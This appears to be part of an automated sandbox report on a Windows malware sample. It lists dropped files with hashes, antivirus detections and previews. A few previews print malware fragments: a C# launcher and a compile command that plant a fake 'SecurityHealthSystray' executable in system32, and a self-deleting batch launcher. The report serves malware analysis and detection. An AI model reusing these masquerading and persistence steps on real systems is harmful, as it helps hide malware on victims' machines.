                                                                                                                                  SHA-256:D0033ED4AA34D05878AFA6AB1C6479ED33BD17CD4C200E37F357C624FFD08CAF
                                                                                                                                  SHA-512:080373414495C629CE4751DCCA3E9E59F44AEDA2C1F8B2269FCAD31A8F2F07AEA988EDA52CA2254694B8AF714735C994BC68D9B7B702FD5EF92D859562DACA51
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:L....Sxg.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESDDA4.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\hyperComponentFontDhcp.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):114688
                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):20480
                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):394
                                                                                                                                  Entropy (8bit):4.906911551284251
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLE9riFkD:JNVQIbSfhV7TiFkMSfho9mFkD
                                                                                                                                  MD5:19C0EF52F59CFEB83693793F73DBEC59
                                                                                                                                  SHA1:D2D68600F82FE9B87020596CE558117B3C3D4145
                                                                                                                                  SHA-256:8BF3619071B3FC8AE6910A87C25E7035F90C5C55C4D969C352E716C5AFA2353B
                                                                                                                                  SHA-512:4F05471096171632C9E8513E6B8C2382143832FDCDAA852F3050B634659D2B3B4877C984F2F2FE2FC88C15D23B8EDABC7A2C0F1C951D92CD4429F34A99A99ECC
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\All Users\SoftwareDistribution\cmd.exe"); } catch { } }).Start();. }.}.
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):250
                                                                                                                                  Entropy (8bit):5.030109533035278
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fzlQA:Hu7L//TRq79cQWfBb
                                                                                                                                  MD5:A644280DBFD86D3F364B57308D3FA377
                                                                                                                                  SHA1:5F85272CF73EDF6DD884B153C8EF8B3217444426
                                                                                                                                  SHA-256:792BA849060C8586AC766284E5B0317C2CA73546298D789765143628B60A207A
                                                                                                                                  SHA-512:D900260A833E5630102F53448C4C91C00E00F8F275A3A8AEDB2856C29F8172CE35532E4D03811636FD45E65A9899E8B2B18068A93A0837C363EC20F3564532B0
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.0.cs"
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (332), with CRLF, CR line terminators
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):753
                                                                                                                                  Entropy (8bit):5.238592505990335
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:55wI/u7L//TRq79cQWfBaKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:55wI/un/Vq79tWfBaKax5DqBVKVrdFAw
                                                                                                                                  MD5:5A452BF2469A4061B183C402986BB40B
                                                                                                                                  SHA1:BAFF4EBF4B54D38F20576D543F2B191F7D40780F
                                                                                                                                  SHA-256:3B0E06E0C5C9994DA5E617AD29FEBAB1B25255D471BE2CA6C034103DBFEC9425
                                                                                                                                  SHA-512:8D114C4F0EDBF5CAC339E6CCA15582D1288C8C0FB8CB671EA25422ED8178BA455AA9CD37F009B2441E64C0977CA596695B5AE950560EFE2974E59C58A4CDB692
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.C:\hyperComponentFontDhcp> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):114688
                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):28672
                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):25
                                                                                                                                  Entropy (8bit):4.403856189774723
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:U/dHhrji:Up1i
                                                                                                                                  MD5:086ABD78FB7579654431420E1C2272CD
                                                                                                                                  SHA1:F1101FD98CFA045D3D37C49DEC1AAC1C03B73736
                                                                                                                                  SHA-256:881D33A886807D7018F2E11DAF50B68155B2CFA997EFD0F1F501E9E3459625A2
                                                                                                                                  SHA-512:F953AA07EB3699A376ED1E020E80F8B45F2A9EE41A6EA82F50B13BA0066FA1150657AA1E8D55A1EDA7834342926EF735F79B39BEE8198C2A3B62FB982C284729
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:N32ZOCzbq7j9hkvVjxN0WgfZG
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):106496
                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):98304
                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):193
                                                                                                                                  Entropy (8bit):5.464136040810033
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:hCRLuVFOOr+DER5/eRMlk1vKOZG1wkn23fYx:CuVEOCDEf/3iDfs
                                                                                                                                  MD5:EFA6EBDAC60FEA4ECED43B37C9CEF95C
                                                                                                                                  SHA1:365E10F2468C0110DE5E9A08B8CA0A36CF95D3F4
                                                                                                                                  SHA-256:7550BAAC0C7C6D9A3CD9734FC787E942F5CB6F108D64D75753EA32162EEE0284
                                                                                                                                  SHA-512:1FFBC73861D08923E6169411968DC1438F1AE01C968625F0A231E93CFDA3C7965895E578EC0D0119811F7F6CA1705D6863205554BB211334A26ED1E66D4DCF7F
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qxQMjDgg8i.bat"
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):25
                                                                                                                                  Entropy (8bit):4.373660689688184
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:uL0Jwj4Sn:uI8F
                                                                                                                                  MD5:C92A44AE7E7A77B740DB582AA4D70386
                                                                                                                                  SHA1:03E4415474E6F1DC92E6FFD9B108BEDED25AE360
                                                                                                                                  SHA-256:56CC2D4ECF36BD9BB480F2DAE24647F5B8B0FE19E7D885600A5A16D56AE6E46D
                                                                                                                                  SHA-512:62BA9E340E9626CA34DE895F2405A3E3E017E425C5E3B9ABDBCC065E37F58D431250EBDDB701874EAB5A4F5EE8FCEEBF24FD69767F1F3FC418C1251DC627385A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:znw3fTCV2z5lReF9zEEaQNxUB
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):5242880
                                                                                                                                  Entropy (8bit):0.037963276276857943
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):41472
                                                                                                                                  Entropy (8bit):5.6808219961645605
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):64000
                                                                                                                                  Entropy (8bit):5.857602289000348
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):33792
                                                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):50176
                                                                                                                                  Entropy (8bit):5.723168999026349
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):33280
                                                                                                                                  Entropy (8bit):5.634433516692816
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):38912
                                                                                                                                  Entropy (8bit):5.679286635687991
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):46592
                                                                                                                                  Entropy (8bit):5.870612048031897
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):34816
                                                                                                                                  Entropy (8bit):5.636032516496583
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
